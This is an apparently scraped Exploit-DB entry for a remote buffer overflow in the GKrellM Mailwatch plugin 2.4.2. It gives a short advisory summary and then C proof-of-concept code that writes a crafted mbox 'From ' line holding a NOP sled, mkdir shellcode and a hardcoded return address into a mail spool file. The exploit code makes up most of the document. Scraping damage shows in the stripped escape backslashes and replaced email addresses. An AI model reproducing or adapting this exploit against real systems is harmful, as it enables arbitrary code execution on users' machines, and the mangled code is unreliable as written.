https://www.exploit-db.com/exploits/22873

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/8118/info

It has been reported that the Mailwatch plugin for GKrellM is vulnerable to a remotely exploitable buffer overflow. This may permit the execution of arbitrary code with the privileges of the GKrellM program.

/*
 * Proof of Concept code for a buffer overflow in  gkrellm plugin gkrellm-mailwatch 2.4.2
 *
 * Overflow occurs in when processing the "From " (not "From: ")
 * field of the email.  This is remotely exploitable if you can pass 
 * shellcode through the mail servers with out it getting foobar'ed
 * in the process.
 * 
 * Since this is just POC, this will create a directory called hacked in gkrellm's CWD.
 * 
 * One last note, it appends to the file you create, so feel free to append to
 * your /var/spool/mail entry.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define RET 0xbffff36d
#define NOP 0x90
#define LEN 520

/* Zillion's mkdir hacked from www.safemode.org */
char code[]=
        "xebx16x5ex31xc0x88x46x06xb0x27x8dx1ex66xb9xed"
        "x01xcdx80xb0x01x31xdbxcdx80xe8xe5xffxffxffx68"
        "x61x63x6bx65x64x23";


int main(int argc, char **argv) {
  int i = 0, offset = 0;
  char ch, *mfile = NULL, *p = NULL, buf[5 + LEN + 6 + 2 + 3 + 1 + 3 + 2 + 1 + 8 + 1 + 4 + 2];  // From %[email protected]  Thu Jun 26 16:45:16 2003n
  long ret = RET, *paddr = NULL;
  FILE *fd;
  
  if(argc < 2) {
    fprintf(stderr, "usage: %s <-m outfile> [-o offset] [-h]n", argv[0]);
    exit(1);
  }

  while((ch = getopt(argc, argv, "m:o:h")) != -1) {
    switch(ch) {
      case 'h':
        fprintf(stderr, "usage: %s <-m outfile> [-o offset] [-h]n", argv[0]);
        exit(1);
      break;

      case 'o':
        ret -= atoi(optarg);
      break;

      case 'm':
        if(!(mfile = malloc(strlen(optarg)+1))) {
          perror("malloc");
          exit(1);
        }
        strcpy(mfile, optarg);
      break; 
    }
  }

  if(!mfile) {
    fprintf(stderr, "usage: %s <-m outfile> [-o offset] [-h]n", argv[0]);
    exit(1);
  }

  fprintf(stderr, "[+] ret 0x%lxn", ret);

  strcpy(buf, "From ");
  p = buf + 5;

  // nops
  for(i=0; i<LEN-strlen(code)-4; i++)
    *(p++) = NOP;

  // shellcode
  for(i=0; i<strlen(code); i++)
    *(p++) = code[i];

  // address
  paddr = (long *)p;
  for(i=0; i<4; i+=4)
    *(paddr++) = ret;

  // terminate and concatenate
  *(p+4) = 0;
  strcat(buf, "@foo.bar  Thu Jun 26 16:45:16 2003n");
  
  // check for an outfile, otherwise send to stdout
  if(mfile) {
    if(!(fd = fopen(mfile, "a"))) {
      perror("fopen");
      exit(1);
    }
    fprintf(stderr, "[+] out %sn", mfile);
  } else {
    fd = stdout;
    fprintf(stderr, "[+] out stdoutn");
  }

  fputs(buf, fd); 
  fputs("Return-Path: <[email protected]>n", fd);
  fputs("Received: from localhost (localhost [127.0.0.1])", fd);
  fputs("tby localhost (8.12.4/8.12.4) with ESMTP id h5QNPG2q003945n", fd);
  fputs("tfor <[email protected]>; Thu, 26 Jun 2003 16:45:16 -0700n", fd);
  fputs("Received: (from [email protected])n", fd);
  fputs("tby localhost (8.12.4/8.12.4/Submit) id h5QNPGuc004172n", fd);
  fputs("tfor root; Thu, 26 Jun 2003 16:45:16 -0700n", fd);
  fputs("Date: Thu, 26 Jun 2003 16:45:12 -0700n", fd);
  fputs("From: [email protected]", fd);
  fputs("Message-Id: <200306262325.h5QNPGuc003744@localhost>n", fd);
  fputs("To: [email protected]", fd);
  fputs("Subject: foobarnn", fd);
  fputs("foobarnn", fd);

  fclose(fd);
  free(mfile);
  exit(0);
}